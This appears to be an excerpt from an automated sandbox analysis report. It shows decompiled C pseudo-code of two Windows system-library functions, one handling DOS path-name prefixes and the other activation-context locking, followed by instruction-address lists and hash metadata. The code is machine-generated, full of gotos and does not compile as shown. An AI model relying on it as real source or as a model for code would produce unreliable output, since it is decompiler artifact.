				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x18ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E017EF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E017D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L017D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E017D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017D45F8))) {
												case 0:
													_v568 = 0x1791078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L017D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E017FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E017FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017B52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E017CEB70(1, 0x18a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E017CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017F95D0();
																			L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E017FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E017F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E017FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x017d4128
0x017d4135
0x017d413c
0x017d4141
0x017d4145
0x017d4147
0x017d414e
0x017d4151
0x017d4159
0x017d415c
0x017d4160
0x017d4164
0x017d4168
0x017d416c
0x017d417f
0x017d4181
0x017d446a
0x017d446a
0x017d418c
0x017d4195
0x017d4199
0x017d4432
0x017d4439
0x017d443d
0x017d4442
0x017d4447
0x00000000
0x017d419f
0x017d41a3
0x017d41b1
0x017d41b9
0x017d41bd
0x017d45db
0x017d45db
0x00000000
0x017d41c3
0x017d41c3
0x017d41ce
0x017d41d4
0x0181e138
0x0181e13e
0x0181e169
0x0181e16d
0x0181e19e
0x0181e16f
0x0181e16f
0x0181e175
0x0181e179
0x0181e18f
0x0181e193
0x00000000
0x0181e199
0x00000000
0x0181e199
0x0181e193
0x00000000
0x00000000
0x00000000
0x017d41da
0x017d41da
0x017d41df
0x017d41e4
0x017d41ec
0x017d4203
0x017d4207
0x0181e1fd
0x017d4222
0x017d4226
0x0181e1f3
0x0181e1f3
0x017d422c
0x017d422c
0x017d4233
0x0181e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x017d4239
0x017d4239
0x017d4239
0x017d4239
0x017d4233
0x017d4226
0x017d41ee
0x017d41ee
0x017d41f4
0x017d4575
0x0181e1b1
0x0181e1b1
0x00000000
0x017d457b
0x017d457b
0x017d4582
0x0181e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x017d4588
0x017d4588
0x017d458c
0x0181e1c4
0x0181e1c4
0x00000000
0x017d4592
0x017d4592
0x017d4599
0x0181e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x017d459f
0x017d459f
0x017d45a3
0x0181e1d7
0x0181e1e4
0x00000000
0x017d45a9
0x017d45a9
0x017d45b0
0x0181e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x017d45b6
0x017d45b6
0x017d45b6
0x00000000
0x017d45b6
0x017d45b0
0x017d45a3
0x017d4599
0x017d458c
0x017d4582
0x00000000
0x00000000
0x00000000
0x00000000
0x017d41f4
0x017d423e
0x017d4241
0x017d45c0
0x017d45c4
0x00000000
0x017d45ca
0x017d45ca
0x00000000
0x0181e207
0x0181e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x017d45d1
0x00000000
0x00000000
0x017d45ca
0x00000000
0x017d4247
0x017d4247
0x017d4247
0x017d4249
0x017d4249
0x017d4249
0x017d4251
0x017d4251
0x017d4257
0x017d425f
0x017d426e
0x017d4270
0x017d427a
0x0181e219
0x0181e219
0x017d4280
0x017d4282
0x017d4456
0x017d45ea
0x00000000
0x017d45f0
0x0181e223
0x00000000
0x0181e223
0x017d445c
0x017d445c
0x00000000
0x017d445c
0x00000000
0x017d4288
0x017d428c
0x0181e298
0x017d4292
0x017d4292
0x017d429e
0x017d42a3
0x017d42a7
0x017d42ac
0x0181e22d
0x017d42b2
0x017d42b2
0x017d42b9
0x017d42bc
0x017d42c2
0x017d42ca
0x017d42cd
0x017d42cd
0x017d42d4
0x017d433f
0x017d433f
0x017d42d6
0x017d42d6
0x017d42d9
0x017d42dd
0x017d42eb
0x0181e23a
0x017d42f1
0x017d4305
0x017d430d
0x017d4315
0x017d4318
0x017d431f
0x017d4322
0x017d432e
0x017d433b
0x017d433b
0x00000000
0x017d432e
0x017d42eb
0x017d434c
0x017d434e
0x017d4352
0x017d4359
0x017d435e
0x017d4361
0x017d436e
0x017d438a
0x017d438e
0x017d4396
0x017d439e
0x017d43a1
0x017d43ad
0x017d43bb
0x017d43bb
0x017d43ad
0x017d436e
0x017d43bf
0x017d43c5
0x017d4463
0x017d4463
0x017d43ce
0x017d43d5
0x017d43d9
0x017d43df
0x017d4475
0x017d4479
0x017d4491
0x017d4491
0x017d4479
0x017d43e5
0x017d43eb
0x017d43f4
0x017d43f6
0x017d43f9
0x017d43fc
0x017d43ff
0x017d44e8
0x017d44ed
0x017d44f3
0x0181e247
0x00000000
0x017d44f9
0x017d4504
0x017d4508
0x017d450f
0x0181e269
0x00000000
0x017d4515
0x017d4519
0x017d4531
0x017d4534
0x017d4537
0x017d453e
0x017d4541
0x017d454a
0x0181e255
0x0181e255
0x0181e25b
0x0181e25e
0x0181e261
0x0181e261
0x017d4555
0x017d4559
0x017d455d
0x0181e26d
0x0181e270
0x0181e274
0x0181e27a
0x0181e27d
0x0181e28e
0x0181e28e
0x017d4563
0x017d4563
0x017d4569
0x017d4569
0x00000000
0x017d455d
0x017d450f
0x00000000
0x017d44f3
0x017d43ff
0x017d4405
0x017d4405
0x017d4405
0x017d42ac
0x017d428c
0x017d4282
0x017d4407
0x017d440d
0x0181e2af
0x0181e2af
0x017d4413
0x017d4413
0x00000000
0x017d41d4
0x00000000
0x017d41c3
0x017d41bd
0x017d4415
0x017d4415
0x017d4416
0x017d4417
0x017d4429
0x017d416e
0x017d416e
0x017d4175
0x017d4498
0x017d449f
0x0181e12d
0x00000000
0x0181e133
0x00000000
0x0181e133
0x017d44a5
0x017d44a5
0x017d44aa
0x00000000
0x017d44bb
0x017d44ca
0x017d44d6
0x017d44d7
0x017d44d8
0x017d44e3
0x017d44e3
0x017d44aa
0x017d417b
0x017d417b
0x017d417b
0x00000000
0x017d417b
0x017d4175
0x00000000

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1755e78adea51aa51b76a7e7d40d3e976bf648f29677c092b324726373058179
Instruction ID: 3f1c18852c0cdddb34ec0b2a0c569c8b65080f7fd344e734320f81ee0cb394a8
Opcode Fuzzy Hash: 1755e78adea51aa51b76a7e7d40d3e976bf648f29677c092b324726373058179
Instruction Fuzzy Hash: 10F179716082158BC725CF18C484A7AFBF1BF88714F54896EF98ACBA94E734D981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 017E20A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E017E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x18a8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E017E2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E017E2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E017B58EC(_t240);
									_t221 =  *0x18a5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x18a5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E017F4A2C(0x18a6e40, 0x17f4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E017D7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1795c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E017EF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E017EF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01837016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L017D2400(_t267 + 0x20);
															}
															L017D2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E017E2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E017D2280(_t134, 0x18a8608);
									__eflags =  *0x18a6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E017CFFB0(_t198, _t241, 0x18a8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x18a6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x18a8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E017E6B90(_t210,  &_v64);
										_t262 =  *0x18a8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E017EE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E017F97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E017F006A(0x18a8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x18a8608);
												E017FB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x18a6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x18a6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E017CFFB0(_t198, _t240, 0x18a8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E017F00C2(0x18a8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x017e20a0
0x017e20a8
0x017e20ad
0x017e20b3
0x017e20b8
0x017e20c2
0x017e20c7
0x017e20cb
0x017e20d2
0x017e2263
0x017e2266
0x01825836
0x01825836
0x00000000
0x017e226c
0x017e226c
0x017e2270
0x017e2274
0x017e20e2
0x017e20e2
0x017e20e6
0x017e20ee
0x018257dc
0x018257de
0x018257ec
0x018257ec
0x018257f1
0x018257f3
0x018257f8
0x00000000
0x018257f8
0x018257e0
0x018257e4
0x018257ea
0x00000000
0x00000000
0x00000000
0x018257ea
0x017e20f4
0x017e20f4
0x017e20f8
0x017e20f8
0x017e20fc
0x017e2100
0x017e2106
0x017e2201
0x017e2206
0x017e220b
0x017e220e
0x017e22a9
0x017e22ac
0x00000000
0x00000000
0x017e22b2
0x017e22b5
0x01825801
0x01825806
0x00000000
0x00000000
0x01825810
0x01825815
0x01825818
0x00000000
0x00000000
0x0182581e
0x017e22bb
0x017e22bb
0x017e2218
0x017e2218
0x017e221c
0x017e2220
0x017e2222
0x017e22c2
0x017e22c4
0x017e22dc
0x017e22dc
0x017e22e1
0x00000000
0x00000000
0x00000000
0x017e22e7
0x017e22c8
0x017e22cd
0x017e22d3
0x017e22d6
0x01825823
0x01825825
0x01825827
0x00000000
0x00000000
0x0182582d
0x00000000
0x0182582d
0x00000000
0x017e2228
0x017e2228
0x00000000
0x017e2228
0x017e2222
0x017e2214
0x017e2214
0x00000000
0x017e2114
0x017e2114
0x017e2114
0x017e211a
0x017e211c
0x017e2348
0x017e234d
0x01825840
0x01825845
0x01825848
0x0182584e
0x0182584e
0x01825848
0x017e2353
0x017e2355
0x017e2388
0x017e2388
0x017e2368
0x017e236a
0x017e236c
0x017e238f
0x00000000
0x017e236e
0x017e236e
0x017e218e
0x017e218e
0x017e2191
0x017e2195
0x01825a03
0x01825a06
0x01825a0c
0x01825a0f
0x01825a11
0x01825a13
0x01825a13
0x01825a19
0x01825a1f
0x00000000
0x017e219b
0x017e219b
0x017e21a0
0x017e2282
0x017e2284
0x017e2284
0x017e2284
0x017e2284
0x017e21a6
0x017e21a9
0x017e21ac
0x017e21ae
0x017e21b3
0x017e228b
0x017e2290
0x017e2379
0x017e2296
0x017e2298
0x017e2298
0x017e2290
0x017e21b9
0x017e21be
0x017e22a2
0x017e22a2
0x017e21c4
0x017e21c8
0x017e21cc
0x017e21d0
0x017e21d4
0x017e21de
0x017e21e3
0x01825a29
0x01825a2c
0x00000000
0x00000000
0x01825a3b
0x00000000
0x017e21e9
